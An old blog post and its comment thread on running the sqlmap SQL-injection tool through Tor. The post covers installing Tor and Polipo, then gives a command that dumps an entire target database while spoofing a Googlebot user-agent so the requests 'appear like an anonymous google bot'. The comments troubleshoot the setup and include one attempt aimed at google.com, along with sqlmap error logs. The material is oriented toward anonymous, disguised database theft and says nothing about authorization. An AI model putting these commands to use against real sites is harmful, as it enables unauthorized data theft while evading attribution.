Thursday, April 14, 2011

sqlmap and tor

There is no better tool at the moment for blind SQL injection than sqlmap. If you don’t use it you should definitely have a look on it. With the latest additions sqlmap supports tor with a command line switch, –tor. Let’s proceed with an installation. My system is debian/ubuntu based but the installation is almost the same for any unix based distribution. Following the instructions, https://www.torproject.org/docs/debian.html.en#ubuntu ,

Add this line to your /etc/apt/sources.list file:

deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main

where you put the codename of your distribution (i.e. lenny, sid, maverick or whatever it is) in place of <DISTRIBUTION>.

Then add the gpg key used to sign the packages by running the following commands at your command prompt:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:

apt-get update
apt-get install tor tor-geoipdb

Start tor, with /etc/init.d/tor start and grab a copy of polito config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf , rename or move the old file in /etc/polipo/config and use the configuration from the URL.Restart polipo with /etc/init.d/polipo restart.

Get sqlmap from the latest svn trunk using

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap

Now you can use sqlmap with –tor with the following command,

~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" and your requests will appear like an anonymous google bot getting information from the website.

11 comments:

  1. sqlmap is fantastic. However, Havij is pretty good, too. I thought a lot of blind SQLi could be automated, but that's not realistic yet. You need to leverage many other resources and make sure to manually test every insertion point.

    ReplyDelete
  2. I'm not using Debian or Ubuntu so I run the command like this and it's not working;

    sqlmap -u http://URL/index.php?cata_id=1 --dump-all -tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 17:09:15

    [17:09:15] [CRITICAL] there has been a file opening error for filename 'or'. Please check write permissions on a file and that it's not locked by another process.

    How can I fix?

    THANKS

    ReplyDelete
  3. My bad I forgot to add in path to tor.. :(

    Ok I run the cmd now like this and tor starts;

    /home/foo/.tor-browser_en-US/start-tor-browser sqlmap -u http://URL/index.php?cata_id=1 --dump-all -tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    So how do we check if this is working or not?


    THANKS

    ReplyDelete
  4. Hi you are forgetting a dash "-" on tor option. sqlmap -u http://URL/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    Sould work for you.

    ReplyDelete
  5. Ok, but I'm trying to do this with the Linux Tor browser bundle so can you do it this way, or you have to do it by installing Tor?


    THANKS

    ReplyDelete
  6. It's the same thing, just make sure that Tor browser bundle is starting tor and polipo.

    ReplyDelete
  7. With the Tor browser bundle you first start Vidalia that then makes the connection and pops open Firefox next after the connection is made... I don't believe the Tor browser bundle uses polipo, I don't see it.

    I take you use Linux so it would be great if you grabbed the Tor browser bundle and try this out and then let me know how you are starting this from the command line?


    THANKS

    ReplyDelete
  8. This doesn't run as a user, I didn't read anywhere that you run this as root.

    This is what I have so far;

    sqlmap -u http://www.google.com/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 22:12:45

    [22:12:46] [INFO] using '/opt/sqlmap/output/www.google.com/session' as session file
    [22:12:46] [INFO] testing connection to the target url
    [22:12:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:49] [CRITICAL] unable to connect to the target url or proxy

    [*] shutting down at: 22:12:49


    SORRY I don't know what I'm doing, I'm just learning at the moment... :(

    If I leave it as http://URL/index.php?cata_id=1 I get this below...

    [CRITICAL] host 'URL' does not exist

    THANKS

    ReplyDelete
  9. This is my problem for now --tor to me means tor lives in the /root path, like /usr/bin and I have the tor browser bundle in my $HOME;

    /home/foo/.tor

    So I don't see how --tor is going to do anything?

    THANKS

    ReplyDelete
  10. I installed Tor and Polipo and I run the cmd and nothing happens;

    sqlmap -u http://URL/index.php?cata_id=1 –dump-all –tor –user-agent=”Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

    Here’s the output below, how can I fix this?

    [11:07:04] [WARNING] increasing default value for –time-sec to 10 because –tor switch was provided
    [11:07:04] [INFO] setting Tor proxy settings
    [11:07:04] [INFO] using ‘/opt/sqlmap/output/URL/session’ as session file
    [11:07:04] [INFO] testing connection to the target url
    [11:07:08] [INFO] heuristics detected web page charset ‘ascii’
    [11:07:08] [CRITICAL] unable to connect to the target url (504 – Gateway Timeout), sqlmap is going to retry the request
    [11:07:08] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the –random-agent switch turned on and/or proxy switches (–ignore-proxy, –proxy,…)
    [11:07:11] [CRITICAL] unable to connect to the target url (504 – Gateway Timeout), sqlmap is going to retry the request
    [11:07:15] [CRITICAL] unable to connect to the target url (504 – Gateway Timeout), sqlmap is going to retry the request
    [11:07:21] [CRITICAL] unable to connect to the target url (504 – Gateway Timeout)
    [11:07:21] [WARNING] HTTP error codes detected during testing:
    504 (Gateway Timeout) – 4 times

    THANKS

    P.S. What change URL to an actual one I presume but it still does nothing...

    sqlmap -u http://www.googe.com/index.php?cata_id=1

    ReplyDelete
  11. Hi, always use quotes "" on the URL, your command should be sqlmap -u "URL/index.php?cat_id=1" also make sure that polipo is having on the configuration file the following options:
    proxyAddress = "127.0.0.1"
    proxyPort = 8118

    ReplyDelete